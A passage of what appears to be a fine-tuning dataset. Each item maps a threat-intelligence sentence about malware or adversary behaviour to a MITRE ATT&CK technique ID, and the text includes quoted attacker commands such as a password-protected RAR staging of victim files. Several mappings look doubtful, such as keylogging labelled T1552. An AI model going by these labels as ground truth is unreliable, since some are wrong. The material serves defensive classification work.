attachments to potential victims using compromised and/or spoofed email accounts.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As such, these protocols are classified as Asymmetric Cryptography.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They provide support for multiple logon processes and multiple security protocols to the operating system.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury can intercept private keys using a trojanized ssh-add function.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP files had names that resembled legitimate Window file and directory names.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has also embedded an XOR encrypted communications module inside the orchestrator module.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If this fails, it attempts to add Registry Run keys.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When it first starts, BADNEWS crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike uses a command-line interface to interact with systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp encodes C&C communication using Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Outlook stores data locally in offline data files with an extension of .ost.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mouse Pointer Check The Trojan will perform the following WMI query:   Select * from Win32_PointingDevice   The Trojan will check the Caption, Description, HardwareType, InfSection, Manufacturer and Name fields in the results for the string VMware, Virtual, VBox, VM or Oracle### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used malicious links to direct users to web pages designed to harvest credentials.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has collected the MAC address of a compromised host; it can also use GetAdaptersInfo to identify network adapters.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has dumped account hashes with Carbanak and cracked them with Cain & Abel.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Methods for doing that include built-in functionality of malware or by using utilities present on the system.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton gathers credentials in files for 1password.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can gather the IP address from the victim's machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PROMETHIUM has attempted to get users to execute compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DOGCALL is encrypted using single-byte XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can use the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,to make it a hidden file.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can download an additional module which has a cryptocurrency mining extension.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts .### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used WMI to execute commands.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can gain remote access and execution on target web servers.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to gather TCP and UDP table status listings.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has the ability to download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The spoolsv.exe process also runs under SYSTEM level permissions.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to access the file system on a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They previously used named and hijacked scheduled tasks to also establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 hijacked FQDNs associated with legitimate websites hosted by hop points.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.### Assistant: T1052: Exfiltration Over Physical Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode”### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to enumerate loaded modules for a process.. Get2 has the ability to identify running processes on an infected host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CloudDuke downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX also has a module to change service configurations as well as start, control, and delete services.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can use regsvr32 for executing scripts.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has exfiltrated files via the Dropbox API C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Javali has been delivered via malicious links embedded in e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once forged, adversaries may use these web cookies to access resources , which may bypass multi-factor and other authentication protection mechanisms.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TDTESS has a command to download and execute an additional file.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub has used XOR encrypted payloads in WebSocket client to server messages.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to decrypt AES encrypted payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FLASHFLOOD stages data it copies from the local system or removable drives in the ""%WINDIR%\$NtUninstallKB885884$\"" directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.### Assistant: T1212: Exploitation for Credential Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito stores configuration values under the Registry key HKCU\Software\Microsoft\dllname and modifies Registry keys under HKCR\CLSID\...\InprocServer32with a path to the launcher.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The EventLog service maintains event logs from various system components and applications.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools to avoid detection.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are “malfunctioning.” Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&%9&jkMCXuiS.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may steal data by exfiltrating it over an existing command and control channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hancitor has been delivered via phishing emails with malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has the ability to identify the username on the compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use a .lnk shortcut for the Control Panel to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain a list of active connections and open ports.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron gathers the victim computer name using the Win32 API call GetComputerName.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpicyOmelette can identify the IP of a compromised system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Search Open Websites/Domains, establishing operational resources or Obtain Capabilities, and/or initial access or Exploit Public-Facing Application.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NTDLL.dll ### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may further enable use of additional techniques for gaining access to systems.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Moafee has been known to employ binary padding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also abuse MMC to execute malicious .msc files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has used Kerberoasting for credential access and to enable lateral movement.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot downloaded several staged items onto the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The DustySky dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files to its dropped files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can establish persistence by adding Registry Run keys.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan has discovered the username of the user running the backdoor.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT leverages cmd.exe to perform discovery techniques.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise executes ipconfig /all after initial communication is made to the remote server.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rifdoor has encrypted command and control communications with a stream cipher.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,YAHOYAH uses HTTP GET requests to download other files that are executed in memory.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can collect data from removable media and stage it for exfiltration.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has also used the open source ADVObfuscation library for its components.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole gathers the local system time from the victim’s machine.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Packets produced from these protocols may have many fields and headers in which data can be concealed.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each end of the communication channels requires a private key and the public key of the other entity.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OnionDuke steals credentials from its victims.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples include dir, tree, ls, find, and locate.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may obtain root access , then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The MirageFox binaries export a function called dll_wWinMain, the name of an export in vsodscpl.dll, a module by McAfee that is loaded by a few of their executables that import and call this function### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has exfiltrated data to its C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet enumerates user accounts of the domain.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 performed password brute-force attacks on the local admin account.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to delete files and directories on compromised hosts.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Smoke Loader scans processes to perform anti-VM checks.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has identified domain admins through the use of “net group ‘Domain admins’” commands.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once forged, adversaries may use these web credentials to access resources , which may bypass multi-factor and other authentication protection mechanisms.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly 2.0 used SMB for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth can use DNS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group's JavaScript backdoor is also capable of downloading files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework., LoadModule() ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can run the ShellExecuteW API via the Windows Command Shell.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity.### Assistant: T1565: Data Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser is capable of listing files, folders, and drives on a victim.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can issue shell commands to download and execute additional payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the ""MaintenaceSrv"" service, which misspells the word ""maintenance.""### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ASPXTool web shell### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak may use netsh to add local firewall rule exceptions.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries to execute on a system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once authenticated, PtH may be used to perform actions on local or remote systems.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.### Assistant: T1212: Exploitation for Credential Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has dumped credentials, including by using gsecdump.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can collect credentials from the Windows Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,System file associations are listed under HKEY_CLASSES_ROOT\.extension, for example HKEY_CLASSES_ROOT\.txt.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can identify the domain membership of a compromised host.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used dumped hashes to authenticate to other machines via pass the hash.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ASPXSpy is a Web shell.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE stages the output from command execution and collected files in specific folders before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS encodes C2 traffic with base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can steal credentials from the victim's browser.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy enumerates information about connected storage devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses the nbtstat -n and nbtstat -s commands on the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These require the user to open the document or file for the exploit to run.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can retrieve usernames.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RATANKBA uploads and downloads information.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used known administrator account credentials to execute the backdoor directly.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used HTTPS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Timestomping may be used along with file name Masquerading to hide malware and tools.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group also ran a modified version of NBTscan to identify available NetBIOS name servers.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn’t exposed until runtime### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\windows\temp\svchost.exe a -m5 -v2000m -hp{password} -inul -r ""{destination_file.rar}"" ""{multiple user directories linked to the victim's projects}"" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1 XAgent macOS HTTP POST request Figure 2 XAgent mscOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may enumerate objects in cloud storage infrastructure.### Assistant: T1619: Cloud Storage Object Discovery" "### Human:Find the techniques and 